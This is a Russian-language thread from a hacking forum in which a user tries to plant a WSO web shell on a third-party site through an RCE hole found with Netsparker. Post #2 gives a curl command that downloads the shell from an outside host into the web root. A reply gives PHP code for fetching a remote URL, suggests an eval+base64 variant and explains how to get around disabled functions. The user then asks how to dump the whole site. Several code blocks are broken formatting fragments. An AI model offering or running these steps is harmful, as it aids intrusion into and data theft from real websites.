HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Загрузка Shell через RCE
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.01.2018, 05:15
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Через нетспаркер нашёл дыру RCE

через команду

Код:
Code:
дыра в регистрации

site.ru/register/jeks.php

site.ru/jeks.php

shell так и не залился искал по адресам которые выше

в чём проблема ?
 
Ответить с цитированием

  #2  
Старый 28.01.2018, 05:21
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
curl -s -k http://txt.731my.com/wso.txt >> /var/www/название сайта/data/www/название сайта.com/wso.php & echo done

тоже не катит
 
Ответить с цитированием

  #3  
Старый 28.01.2018, 05:29
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]
 
Ответить с цитированием

  #4  
Старый 28.01.2018, 05:32
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
[QUOTE="cat1vo"]
cat1vo said:

[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]
 
Ответить с цитированием

  #5  
Старый 28.01.2018, 07:37
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
то исполняется? Папка с правами для записи есть?

как вариант
 
Ответить с цитированием

  #6  
Старый 28.01.2018, 08:24
pas9x
Guest
Сообщений: n/a
Провел на форуме:
97867

Репутация: 52
По умолчанию
ТС, ты хоть пхп для начала выучи, чтоли. Ты уже второй месяц чего-то там взламываешь. За это время можно-бы было выучить язык и больше никогда не создавать нубских топиков.

По сабжу.

Цитата:
Сообщение от Sensoft  
Sensoft said:

нашёл дыру RCE
Для начала надо убедиться что пхп-код вообще выполняется на сервере. Если это RCE то запусти такой код:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://site.ru/file.txt'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$banned[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ini_get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'disable_functions'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]function_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'curl_init'[/COLOR][COLOR="#007700"]) && ![/COLOR][COLOR="#0000BB"]is_int[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$banned[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'curl_'[/COLOR][COLOR="#007700"]))) {
[/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR
Ну или то-же самое под eval+base64. Затем идёшь в админку хостинга site.ru и смотришь в логе веб-сервера заходил-ли кто на /file.txt. Если в логе есть запись с этим uri - значит код на сервере запускается. Ели нет - либо функции заблокированы в disable_functions, либо вообще RCE не работает, что скорее всего.
 
Ответить с цитированием

  #7  
Старый 28.01.2018, 14:52
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от aka PSIH  
aka PSIH said:

то исполняется? Папка с правами для записи есть?
как вариант
Вчера шуршал, папку с правами так и не увидел

теперь понятно почему я не мог загрузить shell
 
Ответить с цитированием

  #8  
Старый 28.01.2018, 14:56
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Просматривать файлы я могу

Есть команда для того чтобы сдампить весь сайт ?
 
Ответить с цитированием

  #9  
Старый 28.01.2018, 21:01
pas9x
Guest
Сообщений: n/a
Провел на форуме:
97867

Репутация: 52
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

Есть команда для того чтобы сдампить весь сайт ?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
 
Ответить с цитированием

  #10  
Старый 29.01.2018, 03:08
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от pas9x  
pas9x said:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
не катит
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ